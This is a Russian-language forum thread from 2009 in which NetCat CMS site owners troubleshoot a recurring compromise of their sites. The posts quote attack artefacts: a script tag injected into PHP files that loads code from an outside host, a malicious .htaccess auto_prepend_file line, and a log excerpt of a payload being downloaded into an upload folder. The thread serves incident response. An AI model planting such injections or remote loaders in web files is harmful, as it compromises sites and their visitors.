|
|
01.07.2009, 18:42
|
|
Balu
Котлевец Владислав
Зарегистрирован:
2009-03-12
Сообщений: 14
|
Возвращаюсь к похожей теме.
Ситуация как в предыдущем посте. Тоже периодически либо в файле vars.inc.php, либо в sql_mysql.php в конец дописывается ссылка вида <script src=http://flo4.biz/1.txt></script>
Компьютер был проверен на вирус касперским.
Система сначала была обновлена до 3.52, потом просто снесена и поставлена заново, и влита старая база. Не помогло. Так же не помогла замена паролей на ftp, да и просто блокировка доступа к сайту по ftp. Зарезание всех прав на доступ к файлам тоже не помог.
Есть ощущение, что заражение происходит при обращении к какой-то странице на сайте, уж слишком нерегулярно оно происходит, чаще в пиковые часы посещаемости.
Уже, честно говоря, не знаю, где искать...
ebugen
|
|
|
02.07.2009, 09:47
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Посмотрите через SSH все процессы от вашего юзера через команду top. Если какие-то процессы не понятны, то нажимаете на k (kill) вводите PID процесса и убиваете его.
У моего клиента была похожая хрень. Я все файлы с сайта удалял, а вирусняк сидел.. в итоге как выяснилось по причине указанной выше.
Temet nosce...
|
|
|
02.07.2009, 13:50
|
|
Balu
Котлевец Владислав
Зарегистрирован:
2009-03-12
Сообщений: 14
|
Команда top на мастерхосте закрыта для использования. А ps -ef никаких процессов для моего пользователя не показывает...
ebugen
|
|
|
02.07.2009, 15:08
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Можно еще попробывать поискать внедрение пхп скриптов в базе данных. Сталкивался с тем, что ломали БД, туда внедряли код, который выполнялся и при генерации страниц вылезал.
еще .htaccess проверьте, в последнее время замечал вот такое:
Код:
php_value auto_prepend_file /home/a/b/docs/netcat/FCKeditor/editor/plugins/placeholder/core.php
Temet nosce...
|
|
|
03.07.2009, 11:49
|
|
MipH
Спирин Дмитрий
Зарегистрирован:
2004-12-22
Сообщений: 252
|
Вероятно, в процессе заражения вам на диск засунули скрипт (файл), при обращении к которому он заново может все это проделать. Найдите его.
bbzone@gmail.com | bbz.ru | miph.info | miph.ruВы можете обратиться ко мне, если необходима разработка функционала на NetCat
|
|
|
03.07.2009, 13:44
|
|
Balu
Котлевец Владислав
Зарегистрирован:
2009-03-12
Сообщений: 14
|
Перекопал весь сервер. Не так много мест, куда можно записать такой скрипт. Причем, интересные вещи наблюдаются. Когда сайт был обновлен до верси 3.52, файлы vars.ink.php и sql_mysql.php лежали в разных папках, и в каждый из этих файлов прописывалась мусорная строка. Когда откатил систему до версии 2.4, ситуация осталась аналогичной, хотя файлы теперь лежат в одной директории. Пробовал изменять права на файлы на 004, т.е. вообще никаких прав на запись в файл. На глазах права меняются на 644 и строка все равно прописывается... Если удалить файл vars.ink.php то строка пишется в sql_mysql.php
ebugen
|
|
|
29.07.2009, 19:53
|
|
Гость
Гость
|
Было примерно такое же, промотал я пароли на фтп, нашел только по логам, раза 4 чистил, ищи backdoors, смотри когда какие файлы модифицированы и т.д. на худой конец сделай backup и залей системные файлы поверх
права проверь на исполняемые файлы
|
|
|
30.07.2009, 18:07
|
|
netcat77
Caen
Зарегистрирован:
2006-07-27
Сообщений: 2
|
DiGGy писал(а):Можно еще попробывать поискать внедрение пхп скриптов в базе данных. Сталкивался с тем, что ломали БД, туда внедряли код, который выполнялся и при генерации страниц вылезал.
еще .htaccess проверьте, в последнее время замечал вот такое:
Код:
php_value auto_prepend_file /home/a/b/docs/netcat/FCKeditor/editor/plugins/placeholder/core.php
Аналогичная проблема. Самое интересное, что FTP у меня закрыт, хожу по SSH, но по логам удалось выяснить, что внедрение этой гадости было сделано и без его помощи. Хостер Ру-Центр, отнеслись с пониманием, помогли поднять все логи, следы остались только в error.log. Вот фрагмент -
--17:53:49-- http://z111601.infobox.ru/bot/gaim2M8myV/0/data.php
=> `/home/***/***.ru/docs/netcat_files/70/72/data.php'
Resolving z111601.infobox.ru... 77.221.130.28
Connecting to z111601.infobox.ru|77.221.130.28|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
0K ..... 196.56 KB/s
17:53:49 (196.56 KB/s) - `/home/***/***.ru/docs/netcat_files/70/72/data.php' saved [5214]
Давайте попробуем разобраться - кто виноват. Разработчики, примите тоже участие. У меня за семь лет - это первый случай. Причем сломали сайты и на стандарте и на комунити.
pushkino
|
|
|
30.07.2009, 21:24
|
|
VlastV
qb.digital
Зарегистрирован:
2005-11-02
Сообщений: 202
|
Возможно на сайте есть форма к которой можно прикрепить файл. Формат у этого поля не заполнен.
Разработка сайтов на CMS NetCat. Портфолио http://vlastv.ru/ E-mail: me [at] vlastv [dot] ru ; ICQ: 66117050
|
